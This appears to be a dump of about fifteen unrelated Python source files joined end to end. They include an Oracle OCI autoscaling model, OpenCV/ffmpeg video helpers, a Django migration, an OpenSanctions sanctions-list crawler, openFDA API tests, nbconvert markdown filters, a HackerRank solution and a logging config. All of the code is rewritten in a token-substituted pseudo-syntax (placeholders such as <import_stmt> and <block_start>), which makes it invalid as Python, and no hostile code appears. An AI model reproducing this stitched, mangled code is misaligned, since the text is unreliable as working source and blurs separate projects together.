# coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. <import_from_stmt>.execution_schedule ExecutionSchedule<import_from_stmt>oci.util formatted_flat_dict NONE_SENTINEL value_allowed_none_or_none_sentinel# noqa: F401 <import_from_stmt>oci.decorators init_model_state_from_kwargs<line_sep>@init_model_state_from_kwargs<class_stmt>CronExecutionSchedule(ExecutionSchedule)<block_start>""" An autoscaling execution schedule that uses a cron expression. """<def_stmt>__init__ self **kwargs<block_start>""" Initializes a new CronExecutionSchedule object with values from keyword arguments. The default value of the :py:attr:`~oci.autoscaling.models.CronExecutionSchedule.type` attribute of this class is ``cron`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param type: The value to assign to the type property of this CronExecutionSchedule. :type type: str :param timezone: The value to assign to the timezone property of this CronExecutionSchedule. Allowed values for this property are: "UTC" :type timezone: str :param expression: The value to assign to the expression property of this CronExecutionSchedule. :type expression: str """<line_sep>self.swagger_types={'type':'str' 'timezone':'str' 'expression':'str'}<line_sep>self.attribute_map={'type':'type' 'timezone':'timezone' 'expression':'expression'}<line_sep>self._type=<none><line_sep>self._timezone=<none><line_sep>self._expression=<none><line_sep>self._type='cron'<block_end>@property<def_stmt>expression self<block_start>""" **[Required]** Gets the expression of this CronExecutionSchedule. 
A cron expression that represents the time at which to execute the autoscaling policy. Cron expressions have this format: `<second> <minute> <hour> <day of month> <month> <day of week> <year>` You can use special characters that are supported with the Quartz cron implementation. You must specify `0` as the value for seconds. Example: `0 15 10 ? * *` :return: The expression of this CronExecutionSchedule. :rtype: str """<line_sep><return>self._expression<block_end>@expression.setter<def_stmt>expression self expression<block_start>""" Sets the expression of this CronExecutionSchedule. A cron expression that represents the time at which to execute the autoscaling policy. Cron expressions have this format: `<second> <minute> <hour> <day of month> <month> <day of week> <year>` You can use special characters that are supported with the Quartz cron implementation. You must specify `0` as the value for seconds. Example: `0 15 10 ? * *` :param expression: The expression of this CronExecutionSchedule. :type: str """<line_sep>self._expression=expression<block_end><def_stmt>__repr__ self<block_start><return>formatted_flat_dict(self)<block_end><def_stmt>__eq__ self other<block_start><if_stmt>other<is><none><block_start><return><false><block_end><return>self.__dict__<eq>other.__dict__<block_end><def_stmt>__ne__ self other<block_start><return><not>self<eq>other<block_end><block_end>
# -*- coding: utf-8 -*- # @Time : 2019-08-02 18:31 # @Author : <NAME> # @Email : <EMAIL> <import_stmt>os<import_stmt>cv2<import_stmt>glob<import_stmt>shutil<import_from_stmt>multiprocessing Pool<import_from_stmt>concurrent.futures ProcessPoolExecutor<import_from_stmt>functools partial<import_from_stmt>tqdm tqdm<import_stmt>numpy<as>np<import_stmt>subprocess<def_stmt>auto_unzip_fun x f<block_start><return>f(*x)<block_end><def_stmt>make_video output_mp4_path img_path_list save_frames_dir=<none> fps=24<block_start>""" output_path is the final mp4 name img_dir is where the images to make into video are saved. """<line_sep>first_img=cv2.imread(img_path_list[0])<line_sep>h,w=first_img.shape[:2]<line_sep>pool_size=40<line_sep>tmp_avi_video_path='%s.avi'%output_mp4_path<line_sep>fourcc=cv2.VideoWriter_fourcc(*'XVID')<line_sep>videoWriter=cv2.VideoWriter(tmp_avi_video_path fourcc fps (w h))<line_sep>args_list=[(img_path )<for>img_path img_path_list]<with_stmt>Pool(pool_size)<as>p<block_start><for_stmt>img tqdm(p.imap(partial(auto_unzip_fun f=cv2.imread) args_list) total=len(args_list))<block_start>videoWriter.write(img)<block_end><block_end>videoWriter.release()<if_stmt>save_frames_dir<block_start><for_stmt>i,img_path enumerate(img_path_list)<block_start>shutil.copy(img_path '%s/%.8d.jpg'%(save_frames_dir i))<block_end><block_end>os.system("ffmpeg -y -i %s -vcodec h264 %s > /dev/null 2>&1"%(tmp_avi_video_path output_mp4_path))<line_sep>os.system("rm %s"%tmp_avi_video_path)<block_end><def_stmt>fuse_image img_path_list row_num col_num<block_start><assert_stmt>len(img_path_list)<eq>row_num<times>col_num<line_sep>img_list=[cv2.imread(img_path)<for>img_path img_path_list]<line_sep>row_imgs=[]<for_stmt>i range(row_num)<block_start>col_imgs=img_list[i<times>col_num:(i+1)<times>col_num]<line_sep>col_img=np.concatenate(col_imgs axis=1)<line_sep>row_imgs.append(col_img)<block_end>fused_img=np.concatenate(row_imgs axis=0)<line_sep><return>fused_img<block_end><def_stmt>fuse_video 
video_frames_path_list output_mp4_path row_num col_num fps=24<block_start><assert_stmt>len(video_frames_path_list)<eq>row_num<times>col_num<line_sep>frame_num=len(video_frames_path_list[0])<line_sep>first_img=cv2.imread(video_frames_path_list[0][0])<line_sep>h,w=first_img.shape[:2]<line_sep>fused_h,fused_w=h<times>row_num w<times>col_num<line_sep>args_list=[]<for_stmt>frame_idx range(frame_num)<block_start>fused_frame_path_list=[video_frames[frame_idx]<for>video_frames video_frames_path_list]<line_sep>args_list.append((fused_frame_path_list row_num col_num))<block_end>pool_size=40<line_sep>tmp_avi_video_path='%s.avi'%output_mp4_path<line_sep>fourcc=cv2.VideoWriter_fourcc(*'XVID')<line_sep># for args in args_list: # fuse_image(*args) # exit() videoWriter=cv2.VideoWriter(tmp_avi_video_path fourcc fps (fused_w fused_h))<with_stmt>Pool(pool_size)<as>p<block_start><for_stmt>img tqdm(p.imap(partial(auto_unzip_fun f=fuse_image) args_list) total=len(args_list))<block_start>videoWriter.write(img)<block_end><block_end>videoWriter.release()<line_sep>os.system("ffmpeg -y -i %s -vcodec h264 %s > /dev/null 2>&1"%(tmp_avi_video_path output_mp4_path))<line_sep>os.system("rm %s"%(tmp_avi_video_path))<block_end><def_stmt>merge src_img ref_img_path out_img_path pad<block_start>h,w=src_img.shape[:2]<line_sep>image_size=h<line_sep>ref_img=cv2.imread(ref_img_path)<line_sep>out_img=cv2.imread(out_img_path)<if_stmt>ref_img.shape[0]<ne>image_size<and>ref_img.shape[1]<ne>image_size<block_start>ref_img=cv2.resize(ref_img (image_size image_size))<block_end><if_stmt>out_img.shape[0]<ne>image_size<and>out_img.shape[1]<ne>image_size<block_start>out_img=cv2.resize(out_img (image_size image_size))<block_end># print(src_img.shape, ref_img.shape, out_img.shape) merge_img=np.concatenate([src_img pad ref_img pad out_img] axis=1)<line_sep><return>merge_img<block_end><def_stmt>load_image image_path image_size=512<block_start>""" Args: image_path (str): image_size (int): Returns: image (np.ndarray): 
(image_size, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>image=cv2.imread(image_path)<line_sep>image=cv2.resize(image (image_size image_size))<line_sep><return>image<block_end><def_stmt>fuse_one_image img_paths image_size<block_start><return>load_image(img_paths[0] image_size)<block_end><def_stmt>fuse_two_images img_paths image_size<block_start>""" Args: img_paths (list of str): image_size (int): Returns: fuse_img (np.ndarray): (image_size // 2, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>img_size=image_size<floordiv>2<line_sep>img_1=load_image(img_paths[0] img_size)<line_sep>img_2=load_image(img_paths[1] img_size)<line_sep>fuse_img=np.concatenate([img_1 img_2] axis=0)<line_sep><return>fuse_img<block_end><def_stmt>fuse_four_images img_paths image_size<block_start>""" Args: img_paths (list of str): image_size (int): Returns: fuse_img (np.ndarray): (image_size, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>fuse_img_1=fuse_two_images(img_paths[0:2] image_size)<line_sep>fuse_img_2=fuse_two_images(img_paths[2:4] image_size)<line_sep>fuse_img=np.concatenate([fuse_img_1 fuse_img_2] axis=1)<line_sep><return>fuse_img<block_end><def_stmt>fuse_eight_images img_paths image_size<block_start>""" Args: img_paths (list of str): image_size (int): Returns: fuse_img (np.ndarray): (image_size // 2, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>fuse_img_1=fuse_two_images(img_paths[0:4] image_size<floordiv>2)<line_sep>fuse_img_2=fuse_two_images(img_paths[4:8] image_size<floordiv>2)<line_sep>fuse_img=np.concatenate([fuse_img_1 fuse_img_2] axis=0)<line_sep><return>fuse_img<block_end><def_stmt>fuse_source all_src_img_paths image_size=512<block_start>""" Args: all_src_img_paths (list of str): the list of source image paths, currently it only supports, 1, 2, 4, 8 number of source images. 
image_size (int): the final image resolution, (image_size, image_size, 3) Returns: fuse_img (np.ndarray): (image_size, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>ns=len(all_src_img_paths)<line_sep># TODO, currently it only supports, 1, 2, 4, 8 number of source images. <assert_stmt>ns<in>[1 2 4 8] "{} must be in [1, 2, 4, 8], currently it only supports, "<concat>"1, 2, 4, 8 number of source images."<if_stmt>ns<eq>1<block_start>fuse_img=load_image(all_src_img_paths[0] image_size)<block_end><elif_stmt>ns<eq>2<block_start>fuse_img=fuse_two_images(all_src_img_paths image_size)<block_end><elif_stmt>ns<eq>4<block_start>fuse_img=fuse_four_images(all_src_img_paths image_size)<block_end><elif_stmt>ns<eq>8<block_start>fuse_img=fuse_eight_images(all_src_img_paths image_size)<block_end><else_stmt><block_start><raise>ValueError("{} must be in [1, 2, 4, 8], currently it only supports, "<concat>"1, 2, 4, 8 number of source images.")<block_end><return>fuse_img<block_end><def_stmt>fuse_source_reference_output output_mp4_path src_img_paths ref_img_paths out_img_paths image_size=512 pad=10 fps=25<block_start>total=len(ref_img_paths)<assert_stmt>total<eq>len(out_img_paths) "{} != {}".format(total len(out_img_paths))<line_sep>fused_src_img=fuse_source(src_img_paths image_size)<line_sep>pad_region=np.zeros((image_size pad 3) dtype=np.uint8)<line_sep>pool_size=min(15 os.cpu_count())<line_sep>tmp_avi_video_path='%s.avi'%output_mp4_path<line_sep>fourcc=cv2.VideoWriter_fourcc(*'XVID')<line_sep>W=fused_src_img.shape[1]+(image_size+pad)<times>2<line_sep>videoWriter=cv2.VideoWriter(tmp_avi_video_path fourcc fps (W image_size))<with_stmt>ProcessPoolExecutor(pool_size)<as>pool<block_start><for_stmt>img tqdm(pool.map(merge [fused_src_img]<times>total ref_img_paths out_img_paths [pad_region]<times>total))<block_start>videoWriter.write(img)<block_end><block_end>videoWriter.release()<line_sep>os.system("ffmpeg -y -i %s -vcodec h264 %s > /dev/null 
2>&1"%(tmp_avi_video_path output_mp4_path))<line_sep>os.system("rm %s"%tmp_avi_video_path)<block_end>
# -*- coding: utf-8 -*- <import_from_future_stmt> unicode_literals<import_from_stmt>django.db models migrations<import_stmt>parsifal.apps.reviews.models<import_stmt>django.db.models.deletion<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('library' '0013_auto_20150710_1614') ('reviews' '0019_study_comments') ]<line_sep>operations=[migrations.CreateModel(name='SearchResult' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('imported_file' models.FileField(null=<true> upload_to=parsifal.apps.reviews.models.search_result_file_upload_to)) ('documents' models.ManyToManyField(to='library.Document')) ('review' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='reviews.Review')) ('search_session' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='reviews.SearchSession' null=<true>)) ('source' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='reviews.Source')) ] ) ]<block_end>
<import_from_stmt>cement.ext.ext_plugin CementPluginHandler<line_sep># module tests <class_stmt>TestCementPluginHandler(object)<block_start><def_stmt>test_subclassing self<block_start><class_stmt>MyPluginHandler(CementPluginHandler)<block_start><class_stmt>Meta<block_start>label='my_plugin_handler'<block_end><block_end>h=MyPluginHandler()<assert_stmt>h._meta.interface<eq>'plugin'<assert_stmt>h._meta.label<eq>'my_plugin_handler'<block_end><block_end># app functionality and coverage tests
<import_from_stmt>prefixdate parse_parts<import_from_stmt>opensanctions helpers<as>h<import_from_stmt>opensanctions.util remove_namespace<def_stmt>parse_address context el<block_start>country=el.get("countryDescription")<if_stmt>country<eq>"UNKNOWN"<block_start>country=<none><block_end># context.log.info("Addrr", el=el) <return>h.make_address(context street=el.get("street") po_box=el.get("poBox") city=el.get("city") place=el.get("place") postal_code=el.get("zipCode") region=el.get("region") country=country country_code=el.get("countryIso2Code") )<block_end><def_stmt>parse_entry context entry<block_start>subject_type=entry.find("./subjectType")<line_sep>schema=context.lookup_value("subject_type" subject_type.get("code"))<if_stmt>schema<is><none><block_start>context.log.warning("Unknown subject type" type=subject_type)<line_sep><return><block_end>entity=context.make(schema)<line_sep>entity.id=context.make_slug(entry.get("euReferenceNumber"))<line_sep>entity.add("notes" entry.findtext("./remark"))<line_sep>entity.add("topics" "sanction")<line_sep>sanction=h.make_sanction(context entity)<line_sep>regulation=entry.find("./regulation")<line_sep>source_url=regulation.findtext("./publicationUrl" "")<line_sep>sanction.set("sourceUrl" source_url)<line_sep>sanction.add("program" regulation.get("programme"))<line_sep>sanction.add("reason" regulation.get("numberTitle"))<line_sep>sanction.add("startDate" regulation.get("entryIntoForceDate"))<line_sep>sanction.add("listingDate" regulation.get("publicationDate"))<for_stmt>name entry.findall("./nameAlias")<block_start><if_stmt>entry.get("strong")<eq>"false"<block_start>entity.add("weakAlias" name.get("wholeName"))<block_end><else_stmt><block_start>entity.add("name" name.get("wholeName"))<block_end>entity.add("title" name.get("title") quiet=<true>)<line_sep>entity.add("firstName" name.get("firstName") quiet=<true>)<line_sep>entity.add("middleName" name.get("middleName") quiet=<true>)<line_sep>entity.add("lastName" 
name.get("lastName") quiet=<true>)<line_sep>entity.add("position" name.get("function") quiet=<true>)<line_sep>gender=h.clean_gender(name.get("gender"))<line_sep>entity.add("gender" gender quiet=<true>)<block_end><for_stmt>node entry.findall("./identification")<block_start>type=node.get("identificationTypeCode")<line_sep>schema="Passport"<if>type<eq>"passport"<else>"Identification"<line_sep>passport=context.make(schema)<line_sep>passport.id=context.make_id("ID" entity.id node.get("logicalId"))<line_sep>passport.add("holder" entity)<line_sep>passport.add("authority" node.get("issuedBy"))<line_sep>passport.add("type" node.get("identificationTypeDescription"))<line_sep>passport.add("number" node.get("number"))<line_sep>passport.add("number" node.get("latinNumber"))<line_sep>passport.add("startDate" node.get("issueDate"))<line_sep>passport.add("startDate" node.get("issueDate"))<line_sep>passport.add("country" node.get("countryIso2Code"))<line_sep>passport.add("country" node.get("countryDescription"))<for_stmt>remark node.findall("./remark")<block_start>passport.add("summary" remark.text)<block_end>context.emit(passport)<block_end><for_stmt>node entry.findall("./address")<block_start>address=parse_address(context node)<line_sep>h.apply_address(context entity address)<for_stmt>child node.getchildren()<block_start><if_stmt>child.tag<in>("regulationSummary")<block_start><continue><block_end><elif_stmt>child.tag<eq>"remark"<block_start>entity.add("notes" child.text)<block_end><elif_stmt>child.tag<eq>"contactInfo"<block_start>prop=context.lookup_value("contact_info" child.get("key"))<if_stmt>prop<is><none><block_start>context.log.warning("Unknown contact info" node=child)<block_end><else_stmt><block_start>entity.add(prop child.get("value"))<block_end><block_end><else_stmt><block_start>context.log.warning("Unknown address component" node=child)<block_end><block_end><block_end><for_stmt>birth entry.findall("./birthdate")<block_start>partialBirth=parse_parts(birth.get("year") 
birth.get("month") birth.get("day"))<line_sep>entity.add("birthDate" birth.get("birthdate"))<line_sep>entity.add("birthDate" partialBirth)<line_sep>address=parse_address(context birth)<if_stmt>address<is><not><none><block_start>entity.add("birthPlace" address.get("full"))<line_sep>entity.add("country" address.get("country"))<block_end><block_end><for_stmt>node entry.findall("./citizenship")<block_start>entity.add("nationality" node.get("countryIso2Code") quiet=<true>)<line_sep>entity.add("nationality" node.get("countryDescription") quiet=<true>)<block_end>context.emit(entity target=<true> unique=<true>)<line_sep>context.emit(sanction)<block_end><def_stmt>crawl context<block_start>path=context.fetch_resource("source.xml" context.dataset.data.url)<line_sep>context.export_resource(path "text/xml" title=context.SOURCE_TITLE)<line_sep>doc=context.parse_resource_xml(path)<line_sep>doc=remove_namespace(doc)<for_stmt>entry doc.findall(".//sanctionEntity")<block_start>parse_entry(context entry)<block_end><block_end>
click(Pattern("Bameumbrace.png").similar(0.80))<line_sep>sleep(1)<line_sep>click("3abnb.png")<line_sep>exit(0)<line_sep>
# coding=utf-8 <import_stmt>inspect<import_stmt>sys<import_from_stmt>openfda.tests.api_test_helpers *<def_stmt>test_nullified_records <block_start>NULLIFIED=['USA-FDACVM-2018-US-045311' 'USA-FDACVM-2018-US-048571' 'USA-FDACVM-2018-US-046672' 'USA-FDACVM-2017-US-070108' 'USA-FDACVM-2017-US-002864' 'USA-FDACVM-2017-US-002866' 'USA-FDACVM-2017-US-052458' 'USA-FDACVM-2017-US-055193' 'USA-FDACVM-2017-US-043931' 'USA-FDACVM-2018-US-002321' 'USA-FDACVM-2017-US-042492' 'USA-FDACVM-2018-US-044065']<for_stmt>case_num NULLIFIED<block_start>meta,results=fetch('/animalandveterinary/event.json?search=unique_aer_id_number:'+case_num)<line_sep>eq_(results <none>)<block_end><block_end><def_stmt>test_single_ae_record <block_start>meta,results=fetch('/animalandveterinary/event.json?search=unique_aer_id_number:USA-USFDACVM-2015-US-094810')<line_sep>eq_(len(results) 1)<line_sep>ae=results[0]<line_sep>eq_("USA-USFDACVM-2015-US-094810" ae["unique_aer_id_number"])<line_sep>eq_(<none> ae.get("@id"))<line_sep>eq_("N141251" ae["report_id"])<line_sep>eq_("20150126" ae["original_receive_date"])<line_sep>eq_("Food and Drug Administration Center for Veterinary Medicine" ae["receiver"]["organization"])<line_sep>eq_("7500 Standish Place (HFV-210) Room N403" ae["receiver"]["street_address"])<line_sep>eq_("Rockville" ae["receiver"]["city"])<line_sep>eq_("MD" ae["receiver"]["state"])<line_sep>eq_("20855" ae["receiver"]["postal_code"])<line_sep>eq_("USA" ae["receiver"]["country"])<line_sep>eq_("Other" ae["primary_reporter"])<line_sep>eq_("Safety Issue" ae["type_of_information"])<line_sep>eq_("true" ae["serious_ae"])<line_sep>eq_("1" ae["number_of_animals_treated"])<line_sep>eq_("1" ae["number_of_animals_affected"])<line_sep>eq_("Dog" ae["animal"]["species"])<line_sep>eq_("Male" ae["animal"]["gender"])<line_sep>eq_("Neutered" ae["animal"]["reproductive_status"])<line_sep>eq_("NOT APPLICABLE" ae["animal"]["female_animal_physiological_status"])<line_sep>eq_("1.00" 
ae["animal"]["age"]["min"])<line_sep>eq_(<none> ae["animal"]["age"].get("max"))<line_sep>eq_("Year" ae["animal"]["age"]["unit"])<line_sep>eq_("Measured" ae["animal"]["age"]["qualifier"])<line_sep>eq_("38.419" ae["animal"]["weight"]["min"])<line_sep>eq_(<none> ae["animal"]["weight"].get("max"))<line_sep>eq_("Kilogram" ae["animal"]["weight"]["unit"])<line_sep>eq_("Measured" ae["animal"]["weight"]["qualifier"])<line_sep>eq_("false" ae["animal"]["breed"]["is_crossbred"])<line_sep>eq_("Retriever - Labrador" ae["animal"]["breed"]["breed_component"])<line_sep>eq_("Recovered/Normal" ae["outcome"][0]["medical_status"])<line_sep>eq_("1" ae["outcome"][0]["number_of_animals_affected"])<line_sep>eq_("Good" ae["health_assessment_prior_to_exposure"]["condition"])<line_sep>eq_("Veterinarian" ae["health_assessment_prior_to_exposure"]["assessed_by"])<line_sep>eq_("20141222" ae["onset_date"])<line_sep>eq_({'value':'4' 'unit':'Week'} ae.get("duration"))<line_sep>eq_("11" ae["reaction"][0]["veddra_version"])<line_sep>eq_("129" ae["reaction"][0]["veddra_term_code"])<line_sep>eq_("Vocalisation" ae["reaction"][0]["veddra_term_name"])<line_sep>eq_("1" ae["reaction"][0]["number_of_animals_affected"])<line_sep>eq_("Actual" ae["reaction"][0]["accuracy"])<line_sep>eq_("11" ae["reaction"][1]["veddra_version"])<line_sep>eq_("960" ae["reaction"][1]["veddra_term_code"])<line_sep>eq_("Pruritus" ae["reaction"][1]["veddra_term_name"])<line_sep>eq_("1" ae["reaction"][1]["number_of_animals_affected"])<line_sep>eq_("Actual" ae["reaction"][1]["accuracy"])<line_sep>eq_(<none> ae.get("time_between_exposure_and_onset"))<line_sep>eq_("false" ae["treated_for_ae"])<line_sep>eq_(1 len(ae["drug"]))<line_sep>eq_("20141222" ae["drug"][0]["first_exposure_date"])<line_sep>eq_("20141222" ae["drug"][0]["last_exposure_date"])<line_sep>eq_("Animal Owner" ae["drug"][0]["administered_by"])<line_sep>eq_("Topical" ae["drug"][0]["route"])<line_sep>eq_("1" ae["drug"][0]["dose"]["numerator"])<line_sep>eq_("tube" 
ae["drug"][0]["dose"]["numerator_unit"])<line_sep>eq_("1" ae["drug"][0]["dose"]["denominator"])<line_sep>eq_("dose" ae["drug"][0]["dose"]["denominator_unit"])<line_sep>eq_('false' ae["drug"][0].get("used_according_to_label"))<line_sep>eq_('Overdosed' ae["drug"][0].get("off_label_use"))<line_sep>eq_("false" ae["drug"][0]["previous_exposure_to_drug"])<line_sep>eq_(<none> ae["drug"][0].get("previous_ae_to_drug"))<line_sep>eq_(<none> ae["drug"][0].get("ae_abated_after_stopping_drug"))<line_sep>eq_(<none> ae["drug"][0].get("ae_reappeared_after_resuming_drug"))<line_sep>eq_(<none> ae["drug"][0].get("manufacturing_date"))<line_sep>eq_('KP09ECX KP09C4D' ae["drug"][0].get("lot_number"))<line_sep>eq_('2017-01' ae["drug"][0].get("lot_expiration"))<line_sep>eq_('000859-2339' ae["drug"][0].get("product_ndc"))<line_sep>eq_("MSK" ae["drug"][0]["brand_name"])<line_sep>eq_('Solution' ae["drug"][0]["dosage_form"])<line_sep>eq_("MSK" ae["drug"][0]["manufacturer"]["name"])<line_sep>eq_("USA-USFDACVM-N141251" ae["drug"][0]["manufacturer"]["registration_number"])<line_sep>eq_(<none> ae["drug"][0].get("number_of_defective_items"))<line_sep>eq_(<none> ae["drug"][0].get("number_of_items_returned"))<line_sep>eq_("QP54AB52" ae["drug"][0]["atc_vet_code"])<line_sep>eq_("Imidacloprid" ae["drug"][0]["active_ingredients"][0]["name"])<line_sep>eq_("500" ae["drug"][0]["active_ingredients"][0]["dose"]["numerator"])<line_sep>eq_("Milligram" ae["drug"][0]["active_ingredients"][0]["dose"]["numerator_unit"])<line_sep>eq_("5" ae["drug"][0]["active_ingredients"][0]["dose"]["denominator"])<line_sep>eq_("mL" ae["drug"][0]["active_ingredients"][0]["dose"]["denominator_unit"])<block_end><if_stmt>__name__<eq>'__main__'<block_start>all_functions=inspect.getmembers(sys.modules[__name__] inspect.isfunction)<for_stmt>key,func all_functions<block_start><if_stmt>key.find("test_")<g>-1<block_start>func()<block_end><block_end><block_end>
"""Markdown filters This file contains a collection of utility filters for dealing with markdown within Jinja templates. """<line_sep># Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. <import_from_future_stmt> print_function<import_stmt>os<import_stmt>subprocess<import_from_stmt>io TextIOWrapper BytesIO<try_stmt><block_start><import_from_stmt>.markdown_mistune markdown2html_mistune<block_end><except_stmt>ImportError<as>e# store in variable for Python 3 <block_start>_mistune_import_error=e<def_stmt>markdown2html_mistune source<block_start>"""mistune is unavailable, raise ImportError"""<line_sep><raise>ImportError("markdown2html requires mistune: %s"%_mistune_import_error)<block_end><block_end><import_from_stmt>nbconvert.utils.pandoc pandoc<import_from_stmt>nbconvert.utils.exceptions ConversionException<import_from_stmt>nbconvert.utils.version check_version<import_from_stmt>ipython_genutils.py3compat cast_bytes<line_sep>__all__=['markdown2html' 'markdown2html_pandoc' 'markdown2html_mistune' 'markdown2latex' 'markdown2rst' ]<def_stmt>markdown2latex source markup='markdown' extra_args=<none><block_start>"""Convert a markdown string to LaTeX via pandoc. This function will raise an error if pandoc is not installed. Any error messages generated by pandoc are printed to stderr. Parameters ---------- source : string Input string, assumed to be valid markdown. markup : string Markup used by pandoc's reader default : pandoc extended markdown (see http://johnmacfarlane.net/pandoc/README.html#pandocs-markdown) Returns ------- out : string Output as returned by pandoc. 
"""<line_sep><return>pandoc(source markup 'latex' extra_args=extra_args)<block_end><def_stmt>markdown2html_pandoc source extra_args=<none><block_start>"""Convert a markdown string to HTML via pandoc"""<line_sep>extra_args=extra_args<or>['--mathjax']<line_sep><return>pandoc(source 'markdown' 'html' extra_args=extra_args)<block_end># The mistune renderer is the default, because it's simple to depend on it markdown2html=markdown2html_mistune<def_stmt>markdown2rst source extra_args=<none><block_start>"""Convert a markdown string to ReST via pandoc. This function will raise an error if pandoc is not installed. Any error messages generated by pandoc are printed to stderr. Parameters ---------- source : string Input string, assumed to be valid markdown. Returns ------- out : string Output as returned by pandoc. """<line_sep><return>pandoc(source 'markdown' 'rst' extra_args=extra_args)<block_end>
<import_from_stmt>datasets.s3dis S3DIS<line_sep>
# ======================== # Information # ======================== # Direct Link: https://www.hackerrank.com/challenges/repeated-string/problem # Difficulty: Easy # Max Score: 20 # Language: Python # ======================== # Solution # ======================== <import_stmt>os<line_sep># Complete the repeatedString function below. <def_stmt>repeatedString s n<block_start>count_1=n<floordiv>len(s)<times>s.count('a')<line_sep>remained_string=n%len(s)<line_sep>count_2=s[:remained_string].count('a')<line_sep><return>count_1+count_2<block_end><if_stmt>__name__<eq>'__main__'<block_start>fptr=open(os.environ['OUTPUT_PATH'] 'w')<line_sep>s=input()<line_sep>n=int(input())<line_sep>result=repeatedString(s n)<line_sep>fptr.write(str(result)+'\n')<line_sep>fptr.close()<block_end>
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """dataset Custom dataset. """<import_stmt>numpy<as>np<import_from_stmt>mindspore dataset<as>ds<def_stmt>get_data num img_size=(1 32 32) num_classes=10 is_onehot=<true><block_start><for_stmt>_ range(num)<block_start>img=np.random.randn(*img_size)<line_sep>target=np.random.randint(0 num_classes)<line_sep>target_ret=np.array([target]).astype(np.float32)<if_stmt>is_onehot<block_start>target_onehot=np.zeros(shape=(num_classes ))<line_sep>target_onehot[target]=1<line_sep>target_ret=target_onehot.astype(np.float32)<block_end><yield>img.astype(np.float32) target_ret<block_end><block_end><def_stmt>create_train_dataset num_data=32768 batch_size=32 repeat_size=1<block_start>input_data=ds.GeneratorDataset(list(get_data(num_data)) column_names=['data' 'label'])<line_sep>input_data=input_data.batch(batch_size drop_remainder=<true>)<line_sep>input_data=input_data.repeat(repeat_size)<line_sep><return>input_data<block_end><def_stmt>create_eval_dataset num_data=2048 batch_size=2048 repeat_size=1<block_start>input_data=ds.GeneratorDataset(list(get_data(num_data)) column_names=['data' 'label'])<line_sep>input_data=input_data.batch(batch_size)<line_sep>input_data=input_data.repeat(repeat_size)<line_sep><return>input_data<block_end>
# coding: utf-8 <import_stmt>os<import_stmt>logging.config<import_from_stmt>webspider setting<line_sep>LOG_FILE_PATH=os.path.join(setting.BASE_DIR 'log' 'spider_log.txt')<line_sep>LOGGING_CONFIG={'version':1 'disable_existing_loggers':<true> 'formatters':{'default':{'format':'%(asctime)s- %(module)s:%(lineno)d [%(levelname)1.1s] %(name)s: %(message)s' 'datefmt':'%Y/%m/%d %H:%M:%S'} } 'handlers':{'console':{'level':'DEBUG' 'formatter':'default' 'class':'logging.StreamHandler'} 'smtp':{'level':'ERROR' 'class':'logging.handlers.SMTPHandler' 'formatter':'default' 'mailhost':(setting.SMTP_CONF['host'] setting.SMTP_CONF['port']) 'fromaddr':setting.SMTP_CONF['from_email'] 'toaddrs':[setting.SMTP_CONF['to_email'] ] 'subject':'爬虫系统出现异常' 'credentials':(setting.MAIL_CONF['username'] setting.MAIL_CONF['password'])} 'file':{'level':'ERROR' 'formatter':'default' 'class':'logging.handlers.RotatingFileHandler' 'filename':LOG_FILE_PATH 'encoding':'utf8'} } 'loggers':{'':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } 'webspider':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } 'tornado':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } 'tornado.access':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'tornado.application':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'tornado.general':{'handlers':['console' 'file'] 'propagate':<false> 'level':'INFO' } 'sqlalchemy.engine':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'gunicorn':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'celery':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } } }<def_stmt>config_logging <block_start>"""配置日志"""<line_sep>logging.config.dictConfig(LOGGING_CONFIG)<block_end>
<import_stmt>glob<import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<import_stmt>sys<line_sep>plt.ion()<line_sep>data_files=list(glob.glob(sys.argv[1]+'/mnist_net_*_train.log'))<line_sep>valid_data_files=list(glob.glob(sys.argv[1]+'/mnist_net_*_valid.log'))<for_stmt>fname data_files<block_start>data=np.loadtxt(fname).reshape(-1 3)<line_sep>name=fname.split('/')[-1]<line_sep>plt.plot(data[: 0] 1-data[: 2] label=name)<block_end><for_stmt>fname valid_data_files<block_start>data=np.loadtxt(fname).reshape(-1 2)<line_sep>name=fname.split('/')[-1]<line_sep>plt.plot(data[: 0] 1-data[: 1] label=name)<block_end>plt.legend(loc=1)<line_sep>raw_input('Press Enter.')<line_sep>
